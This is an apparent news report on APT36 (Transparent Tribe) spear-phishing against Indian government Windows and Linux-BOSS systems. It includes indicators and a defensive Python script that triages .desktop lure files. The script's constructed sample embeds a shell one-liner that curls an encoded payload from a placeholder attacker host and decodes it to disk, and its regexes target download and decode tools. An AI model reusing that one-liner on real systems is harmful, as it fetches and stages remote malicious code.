New Delhi – The Transparent Tribe, also known as APT36, has expanded its campaign against Indian government targets, showcasing a cross‑platform capability that targets both Windows endpoints and Linux‑BOSS deployments.
According to CYFIRMA, initial access is gained through spear‑phishing emails. The firm notes that Linux BOSS environments are targeted via weaponized desktop shortcut files that, when opened, download and execute malicious payloads.
The attack chain begins with phishing emails bearing a supposed meeting notice that deliver booby‑trapped Linux desktop shortcut files named Meeting_Ltr_ID1543ops.pdf.desktop. When opened, a shell script downloads a hex‑encoded file from an attacker server, writes it to disk as an ELF binary, and launches a decoy PDF hosted on Google Drive via Mozilla Firefox. The payload is delivered by a Go‑based binary that communicates with a hard‑coded command‑and‑control server at modgovindia.space:4000 to receive commands, fetch payloads, and exfiltrate data. The campaign also uses a cron job to ensure persistence after reboot or process termination.
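As an added illustration (not code from CYFIRMA, CloudSEK or the article), the script below triages a Linux `.desktop` file for the traits of the lure described above: a document‑style double extension, an `Exec` line that wraps a shell one‑liner fetching and decoding a blob, and a Firefox‑launched decoy on Google Drive. The sample entries, hostnames and regexes are constructed assumptions for the example, not published indicators.

```python
import re
from pathlib import PurePath

# Heuristics modelled on the reported chain (assumptions, not CYFIRMA IoCs).
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)
SHELL_WRAP = re.compile(r"\b(ba|z|da)?sh\s+-c\b")
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
DECODER = re.compile(r"\bxxd\s+-r|\bbase64\s+(-d|--decode)\b")
DECOY_OPEN = re.compile(r"\bfirefox\b.*drive\.google\.com")

def parse_desktop(text: str) -> dict:
    """Return key=value pairs from the [Desktop Entry] group (last value wins)."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def triage_desktop(filename: str, text: str) -> list[str]:
    """Return the indicators matched; an empty list means nothing flagged."""
    exec_line = parse_desktop(text).get("Exec", "")
    checks = [
        (DOUBLE_EXT.search(PurePath(filename).name), "document-style double extension"),
        (SHELL_WRAP.search(exec_line), "Exec wraps a shell one-liner"),
        (FETCH_TOOL.search(exec_line), "Exec downloads content at launch"),
        (DECODER.search(exec_line), "Exec decodes an encoded blob to disk"),
        (DECOY_OPEN.search(exec_line), "Exec opens a decoy hosted on Google Drive"),
    ]
    return [reason for matched, reason in checks if matched]

# Constructed sample shaped like the reported lure; hostnames are placeholders.
LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s http://c2.example.invalid/p.hex | xxd -r -p > /tmp/.u; firefox https://drive.google.com/file/d/PLACEHOLDER"
"""
# Constructed benign launcher for comparison.
BENIGN = "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\nIcon=firefox\n"

if __name__ == "__main__":
    print(triage_desktop("Meeting_Ltr_ID1543ops.pdf.desktop", LURE))  # five indicators
    print(triage_desktop("firefox.desktop", BENIGN))                   # []
```

On a BOSS endpoint the same function can be run over `~/Desktop`, `~/.local/share/applications` and the user's download directory, with any non‑empty result queued for analyst review.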
Researchers from CloudSEK described the activity as capable of performing system reconnaissance and employing dummy anti‑debugging and anti‑sandbox checks to throw off emulators and static analyzers. CloudSEK’s investigation is further detailed in its public write‑up.
Hunt.io’s analysis identifies the use of a known Transparent Tribe backdoor, Poseidon, which enables data collection, long‑term access, credential harvesting, and potential lateral movement. The assessment underscores the group’s ongoing effort to adapt its infrastructure to sustain access.
CYFIRMA noted the group’s ability to customize its delivery mechanisms to the victim’s operating environment, increasing the likelihood of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.
The researchers also highlight Kavach, the Indian government’s 2FA solution, as a target for phishing campaigns that rely on typo‑squatted domains and lookalike login pages to harvest credentials and authentication codes. CYFIRMA linked the Kavach‑themed phishing activity to their broader APT36 research.
Separately, StrikeReady reported a campaign targeting Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey via spear‑phishing pages hosted on Netlify and Pages.dev, designed to harvest credentials from government and related domains.
Experts caution that the Transparent Tribe’s evolving tactics – from Windows to Linux, from standard phishing to credential‑harvesting pages – signal a sustained effort to compromise government networks and maintain footholds over time.